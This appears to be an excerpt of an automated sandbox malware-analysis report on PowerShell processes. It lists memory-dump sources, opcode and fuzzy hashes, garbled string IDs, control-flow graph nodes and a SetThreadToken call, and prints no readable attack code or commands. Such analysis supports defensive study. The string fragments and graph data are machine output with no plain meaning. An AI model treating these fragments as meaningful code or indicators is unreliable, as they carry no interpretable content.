                                                                            • String ID: xo^$xo^$xo^$xo^$xo^
                                                                            • API String ID: 0-2425003715
                                                                            • Opcode ID: 8ed17b1726f2d62f658fec7d508d1dfb1231a8bf3cf97f7126fb1717562f93a7
                                                                            • Instruction ID: 217f95c1e2ef3c5eaa2dad013a459fe6228a5fc1d1c851129ba21a922dac59fe
                                                                            • Opcode Fuzzy Hash: 8ed17b1726f2d62f658fec7d508d1dfb1231a8bf3cf97f7126fb1717562f93a7
                                                                            • Instruction Fuzzy Hash: 0B41716260A7C05FC707DB3C94A46907FB1EF97298B0A44EBD1D4CF2A7DA149C4AC352
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$$cq$$cq
                                                                            • API String ID: 0-2876200767
                                                                            • Opcode ID: 7c6af773e0bc8fc313febe906c7030762b3f161cd1edfdf949e5934ba4114464
                                                                            • Instruction ID: f49ebe980a8bfec750550a61a7e5a44a59b5b183f03b06ef4660f3e2bdcbc6a4
                                                                            • Opcode Fuzzy Hash: 7c6af773e0bc8fc313febe906c7030762b3f161cd1edfdf949e5934ba4114464
                                                                            • Instruction Fuzzy Hash: A521ABB13003069BDB34593A9809727BB9B9BD1B19F25853AE906CB7C2DD75C8118361
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$pij$J!l$J!l
                                                                            • API String ID: 0-1243686353
                                                                            • Opcode ID: 7e844eaa361f87b7e8b7df2206be5d4b7f4a83ab8b529232e82d60e7d6bf81d7
                                                                            • Instruction ID: b617e9eefa82812b1ab0ebb334a9c9f575bc5a1e822676da5540c01d44516ef5
                                                                            • Opcode Fuzzy Hash: 7e844eaa361f87b7e8b7df2206be5d4b7f4a83ab8b529232e82d60e7d6bf81d7
                                                                            • Instruction Fuzzy Hash: AD3122F1908346DFDB218F24C148AAABBF8BF02719F0886A6D8588B151D338D944CB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$tPcq$J!l$J!l
                                                                            • API String ID: 0-2252457019
                                                                            • Opcode ID: 905bd357882768714a794c4213c4af858eb34b4ab820962dad828991a7ec7ee8
                                                                            • Instruction ID: f4c1aad8b33d995b0dfff32c9b7279a13a46b5e24ee171603d22265a24780da6
                                                                            • Opcode Fuzzy Hash: 905bd357882768714a794c4213c4af858eb34b4ab820962dad828991a7ec7ee8
                                                                            • Instruction Fuzzy Hash: 2B21D1B1A4020ADFDB249F45C44AB36FBBAFF85318F5882A6DA055F192C772D841C7A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq
                                                                            • API String ID: 0-1126079151
                                                                            • Opcode ID: 09d3a5fcc74245ccb12acffcacdcf2ee15aa0625a60a90ca0ed7295c17ed9e95
                                                                            • Instruction ID: c6b94993ba988ad275eea2672f988a805c4c11851081a6d933cd26d0245af911
                                                                            • Opcode Fuzzy Hash: 09d3a5fcc74245ccb12acffcacdcf2ee15aa0625a60a90ca0ed7295c17ed9e95
                                                                            • Instruction Fuzzy Hash: BB116BA1B0D7964FCB2B123C68B59AA6BB7DBC2156B5D0AD7C081CF297DA144C0287D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$J!l$J!l
                                                                            • API String ID: 0-2426129395
                                                                            • Opcode ID: a3e5ff8b582793651e6af90c8b6f884c216885c98537bc544cddba3b31eb1054
                                                                            • Instruction ID: a513cde870babb66ce70247c27c7569e8352a17b682c11f60372627e093370fa
                                                                            • Opcode Fuzzy Hash: a3e5ff8b582793651e6af90c8b6f884c216885c98537bc544cddba3b31eb1054
                                                                            • Instruction Fuzzy Hash: CD0128F161D3514FC32383284C141567BE6AFC3114B1B46A7D685EF657C9344C05C3A2

                                                                            Execution Graph

                                                                            Execution Coverage:6.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 22549 87b6890 22550 87b68d3 SetThreadToken 22549->22550 22551 87b6901 22550->22551

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 722 2efb470-2efb4a9 724 2efb4ae-2efb7e9 call 2efacbc 722->724 725 2efb4ab 722->725 786 2efb7ee-2efb7f5 724->786 725->724
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19b3c5a9687e57d5f1482d8f674319b5e05cad191ed4eefcdcfa8e513f599cba
                                                                            • Instruction ID: 26955a761780ce81ce5b19a3c91316bc753cd10adefd76d0f561bad92e9e2c26
                                                                            • Opcode Fuzzy Hash: 19b3c5a9687e57d5f1482d8f674319b5e05cad191ed4eefcdcfa8e513f599cba
                                                                            • Instruction Fuzzy Hash: 95916DB1E406155BDB16EBB489116AFBBF2EFC4700B40C92EE106AB354DF346E068BD5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 787 2efb490-2efb4a9 788 2efb4ae-2efb7e9 call 2efacbc 787->788 789 2efb4ab 787->789 850 2efb7ee-2efb7f5 788->850 789->788
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 512803599abc4a9abadda616d68a36c40f9694ed1478853ea5265c6a80eb237f
                                                                            • Instruction ID: 2ba8f626fcea9e5d4c01918522e259646a370204f30b96d6b918fd739c5fc833
                                                                            • Opcode Fuzzy Hash: 512803599abc4a9abadda616d68a36c40f9694ed1478853ea5265c6a80eb237f
                                                                            • Instruction Fuzzy Hash: E7914DB0E406155BDB59EBB489116AFB7E3EFC4700B40C92DE116AB354DF346E068BC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,S l$,S l$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$pij$pij$pij$pij$pij$tPcq$tPcq$tPcq$tPcq$tPcq$tPcq$|,j$$cq$$cq$$cq$J!l$J!l$J!l$J!l$J!l$J!l$R l$R l$r l$r l
                                                                            • API String ID: 0-877334054
                                                                            • Opcode ID: 12b9c3099271ae1b6e84487bfe6af5012d5158968e1be8ba034f68a93c9bcb77
                                                                            • Instruction ID: 8349881eb2ff242ea3028bfa8a106d7c5ecedaf9ecea60e9adda517284d6bcdf
                                                                            • Opcode Fuzzy Hash: 12b9c3099271ae1b6e84487bfe6af5012d5158968e1be8ba034f68a93c9bcb77
                                                                            • Instruction Fuzzy Hash: CBB25DB1B142069FDB259B7984117AABBF2FF86310F24807AE906DB391DB35CD41C7A1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 465 2efe5b9-2efe5c0 466 2efe622-2efe630 465->466 467 2efe5c2-2efe602 465->467 469 2efe693-2efe6b6 466->469 470 2efe632-2efe689 466->470 480 2efe6bc-2efe6d3 469->480 481 2efe73a-2efe753 469->481 470->469 486 2efe6db-2efe738 480->486 484 2efe75e 481->484 485 2efe755 481->485 487 2efe75f 484->487 485->484 486->480 486->481 487->487
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: 3477233401794598cc79f544fd7c4d06e8554062ab371d64a05c8ba929699e63
                                                                            • Instruction ID: a25314698d12c604775baa5f2dd993248731533f75612d1d09b96e1e95e98708
                                                                            • Opcode Fuzzy Hash: 3477233401794598cc79f544fd7c4d06e8554062ab371d64a05c8ba929699e63
                                                                            • Instruction Fuzzy Hash: 7041A970A016099FCB15DFA9E9646DDBBF2FF89304F5485A9E009EB391DB306D44CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 495 2efe610-2efe630 497 2efe693-2efe6b6 495->497 498 2efe632-2efe689 495->498 505 2efe6bc-2efe6d3 497->505 506 2efe73a-2efe753 497->506 498->497 511 2efe6db-2efe738 505->511 509 2efe75e 506->509 510 2efe755 506->510 512 2efe75f 509->512 510->509 511->505 511->506 512->512
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: e7414abad1a2607edaea398b98bbf7669c2d6c4c58a5ad7169fcab703f2a793d
                                                                            • Instruction ID: 5461f106646fe047093fedc5d9e55c183c082f710936387f793091ab113b386d
                                                                            • Opcode Fuzzy Hash: e7414abad1a2607edaea398b98bbf7669c2d6c4c58a5ad7169fcab703f2a793d
                                                                            • Instruction Fuzzy Hash: 7541D970A016058FCB12DF69E9A4BDEBBF2FF49204F548569E006EB391DB30AC00CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 520 2efe640-2efe6b6 527 2efe6bc-2efe6d3 520->527 528 2efe73a-2efe753 520->528 533 2efe6db-2efe738 527->533 531 2efe75e 528->531 532 2efe755 528->532 534 2efe75f 531->534 532->531 533->527 533->528 534->534
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$J!l
                                                                            • API String ID: 0-666041647
                                                                            • Opcode ID: 510f5884d7b63c1f447435a2b5007136746ff0f9ee4087838bd17b29a422dd11
                                                                            • Instruction ID: 494d83f1138bbd98156edb19c9dac60167376113cb3c69eba12eadb0b5bbf647
                                                                            • Opcode Fuzzy Hash: 510f5884d7b63c1f447435a2b5007136746ff0f9ee4087838bd17b29a422dd11
                                                                            • Instruction Fuzzy Hash: 0B316770A416058FCB15DF69D594A9EBBF2FF88304F548928E41AAB390DB30BD44CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 542 87b6889-87b68cb 543 87b68d3-87b68ff SetThreadToken 542->543 544 87b6908-87b6925 543->544 545 87b6901-87b6907 543->545 545->544
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2158657264.00000000087B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_87b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3254676861-0
                                                                            • Opcode ID: c041f5196e7df3caee5af96ed9afe84fa8b4ad6f5f15c668fc0a744ea34dcd6f
                                                                            • Instruction ID: a993fae7f5bcb99d7a8dcf0d68c9be6993aba493a38b9d14d0be733683c99ee8
                                                                            • Opcode Fuzzy Hash: c041f5196e7df3caee5af96ed9afe84fa8b4ad6f5f15c668fc0a744ea34dcd6f
                                                                            • Instruction Fuzzy Hash: CE1113B59002488FCB10DF9AD984BDEFFF4EB98320F24846AD519A7310C7B4A944CFA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 548 87b6890-87b68ff SetThreadToken 550 87b6908-87b6925 548->550 551 87b6901-87b6907 548->551 551->550
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2158657264.00000000087B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_87b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3254676861-0
                                                                            • Opcode ID: 81b883ea29c2fa3a54c3407d1567b1269ffc9e730503ae1d6687d76ca4c98a0d
                                                                            • Instruction ID: 551ed2c7dee83c7a44cd6ec7e9a008a19cfbca8b305332f35c2fb062fb7ca765
                                                                            • Opcode Fuzzy Hash: 81b883ea29c2fa3a54c3407d1567b1269ffc9e730503ae1d6687d76ca4c98a0d
                                                                            • Instruction Fuzzy Hash: ED11F2B59003498FCB10DF9AC984BDEFBF9EB98320F24842AD519A7310D774A944CFA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (gq
                                                                            • API String ID: 0-1972435379
                                                                            • Opcode ID: 9f148ef16c7bfa8efc275ddbb63f64b7b533cd75242b2a4e1686ba33c866e50c
                                                                            • Instruction ID: 160044cc965c1570691f3d00ffb7eb9738a443b3c8081184fe0d251ab4fb7eeb
                                                                            • Opcode Fuzzy Hash: 9f148ef16c7bfa8efc275ddbb63f64b7b533cd75242b2a4e1686ba33c866e50c
                                                                            • Instruction Fuzzy Hash: C1416D34B402048FDB54DF68C564AAEBBF2EF8E315F149498E502AB391DB35DC41CB60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 606 2efaf98-2efafa1 call 2efa984 608 2efafa6-2efafaa 606->608 609 2efafac-2efafb9 608->609 610 2efafba-2efb055 608->610 617 2efb05e-2efb07b 610->617 618 2efb057-2efb05d 610->618 618->617
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (&cq
                                                                            • API String ID: 0-298851153
                                                                            • Opcode ID: 4d588c810e314e6219772fa55d9ee7bf7c6d8e2972d7ba962a18e75de12c0da3
                                                                            • Instruction ID: 6e17dd222759e368551c7d9f12c574381b0f92a0ff6d3aef6bd74e9d35ab6d99
                                                                            • Opcode Fuzzy Hash: 4d588c810e314e6219772fa55d9ee7bf7c6d8e2972d7ba962a18e75de12c0da3
                                                                            • Instruction Fuzzy Hash: 8421DE76A002588FCB14DBAED8006AEBBF6EF89320F14846AD518E7340CB7499058BE4

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            • Instruction Fuzzy Hash: 7711AF769053498FCB10CF99D908BEAFFF4EF49724F18805AD508A7251D738A544CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 31495fc2a9b9d34250bcef2918a26e4e0d764a1482765680040ba6ef01a132e6
                                                                            • Instruction ID: 860464b1c5d58c8a6a41d7e43077f203f2ad7d932ab47b8cd548eced1a935f03
                                                                            • Opcode Fuzzy Hash: 31495fc2a9b9d34250bcef2918a26e4e0d764a1482765680040ba6ef01a132e6
                                                                            • Instruction Fuzzy Hash: F11119797001188FCB04DBA8E844AEDB7F6EBCC355B0580A4E609DB354DB35DD169BA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction ID: ff5831eaaa65f22c33eb0753727f3855b22de11f2dd8333a83a1b36273814861
                                                                            • Opcode Fuzzy Hash: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction Fuzzy Hash: B821CD76544240DFCF06CF10D9C4B16BF72FB88318F24C5A9D9094A656C33AD46ACB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction ID: d9a5f1a995aad9abfac243fa659603045f6f907734432ea2e6410f4d1be1f782
                                                                            • Opcode Fuzzy Hash: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction Fuzzy Hash: 6711DD7A544280CFCB12CF14D5C4B15BFA1FB84328F28C6AED8094BB56C33AD44ACB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 493fe4d62fc83de64594a139af9c7da5f72400bd60381a07776397866d9dd028
                                                                            • Instruction ID: 61b67f3b5854b4a03bad50b76e0cacdfa2de4967edc0860669bee7b54df5b82a
                                                                            • Opcode Fuzzy Hash: 493fe4d62fc83de64594a139af9c7da5f72400bd60381a07776397866d9dd028
                                                                            • Instruction Fuzzy Hash: E30122316083448FC754CB79D894A9ABFE0EF46214B1488EEE04AC76A2CB31EC41C700
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17ddece9af3242f6d5bb1cdc8ebd67877742b15ef50f079e4d0a70da4f1c04b2
                                                                            • Instruction ID: c46332e64e50894c9c6624306a690162436203661dfc98eb037d148d2e69e750
                                                                            • Opcode Fuzzy Hash: 17ddece9af3242f6d5bb1cdc8ebd67877742b15ef50f079e4d0a70da4f1c04b2
                                                                            • Instruction Fuzzy Hash: 7901F136B150449BCB45CAB8EC145E8BFA2EB8A225B14D4BAD605D7201DA324C01CBE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8aa35ce82da52676c07ddc4153efc85285ed22674db7aa388213e1717bb98f43
                                                                            • Instruction ID: 0e45f285fd2cf1167190af124d3615596d4b7328a6086e9ed7183b9d8a240d3e
                                                                            • Opcode Fuzzy Hash: 8aa35ce82da52676c07ddc4153efc85285ed22674db7aa388213e1717bb98f43
                                                                            • Instruction Fuzzy Hash: 5B116A76901309CFDB50CF9ACA08B9EBBF4EB48714F28806DD508A7251D339A540CBA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce3693a8f95a3e64dd59471414ff974351e176fb8cdc59f2da7953b4bb28c76b
                                                                            • Instruction ID: 5785172bc7b36a2f681cde0bfb421c066b7b8713b59e1f40d7650dbdbe88eee0
                                                                            • Opcode Fuzzy Hash: ce3693a8f95a3e64dd59471414ff974351e176fb8cdc59f2da7953b4bb28c76b
                                                                            • Instruction Fuzzy Hash: E30147327002408FC785CF78D954A6E7FF6EB89225B0159AEE50AD7610DB319D00C710
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e865fb85255a0173cf9df2841b0d53998d60cc913cc1d479ff60f1d535d2bfbd
                                                                            • Instruction ID: 7bc8c3a2a3d5d0f23ec42dd27ec9b9d5432ae0d5241c628f7b2f8d0cb5980a40
                                                                            • Opcode Fuzzy Hash: e865fb85255a0173cf9df2841b0d53998d60cc913cc1d479ff60f1d535d2bfbd
                                                                            • Instruction Fuzzy Hash: 6E0147F2B020915BC725127C080215EAB128FD2B28F1001A7CD03AF386CF389D0287EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a06dc61d51f1a3e5056b968100adc9591f478ca4e9643d3e5b5a45576156673
                                                                            • Instruction ID: a1f7eacfe740839522b8f185e80386c4351379160e5f8c170943539d5197c406
                                                                            • Opcode Fuzzy Hash: 9a06dc61d51f1a3e5056b968100adc9591f478ca4e9643d3e5b5a45576156673
                                                                            • Instruction Fuzzy Hash: 10015235B012149FCB119B74E8086AEBBF6FB89315F144069E55AD3341DB355D11CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16fc0bac4664c6630929d6c2a9f61be3ce31d8ababc21324dffec2609188bfe6
                                                                            • Instruction ID: d48e256fd112e506f0ff124524cc1d68b8d76911d04e95ac5e7452faf29b9600
                                                                            • Opcode Fuzzy Hash: 16fc0bac4664c6630929d6c2a9f61be3ce31d8ababc21324dffec2609188bfe6
                                                                            • Instruction Fuzzy Hash: 711105342047508FC768DF75D08086ABBF6EF8921976489ADD48A8B7A0DB36FC41CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f3e8e64876f21749646982acf660aa7f822643d11c2771fe87fcae01c4931a2
                                                                            • Instruction ID: 81ecd8d8679c1dfb7d50bf47702931db5b105116c7ed01e1a9f73fdba8a0dde4
                                                                            • Opcode Fuzzy Hash: 7f3e8e64876f21749646982acf660aa7f822643d11c2771fe87fcae01c4931a2
                                                                            • Instruction Fuzzy Hash: F5F0C8323093A01FD7114A79AC549B7BFE9DF86561705407BF944C73A1CA70CD0487A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6427265e20e74d960ac9fa56356bd4d6781e438de159c94b254ad6fb12497f7
                                                                            • Instruction ID: 64564e9ce9fdec952f07c80df47f14291a99f5b61a2e0f3d804e5e6371cc60b8
                                                                            • Opcode Fuzzy Hash: e6427265e20e74d960ac9fa56356bd4d6781e438de159c94b254ad6fb12497f7
                                                                            • Instruction Fuzzy Hash: CF01E96244E3C09ED7128B258D94B52BFB8DF53228F1DC1DBE9888F1A7C2695849C772
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4780f6d2b848e669228519bc2039138bc2866ff6305ae5c0789e8e0ad2dd4725
                                                                            • Instruction ID: 068eb4b020b3d370aef31aa526905700a51b498e00071a0c83f8dab558fe0658
                                                                            • Opcode Fuzzy Hash: 4780f6d2b848e669228519bc2039138bc2866ff6305ae5c0789e8e0ad2dd4725
                                                                            • Instruction Fuzzy Hash: 6201D6714453449AEB218A2ACDC4B67FF98DF42338F1CE41AED494B246C7799941C6B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
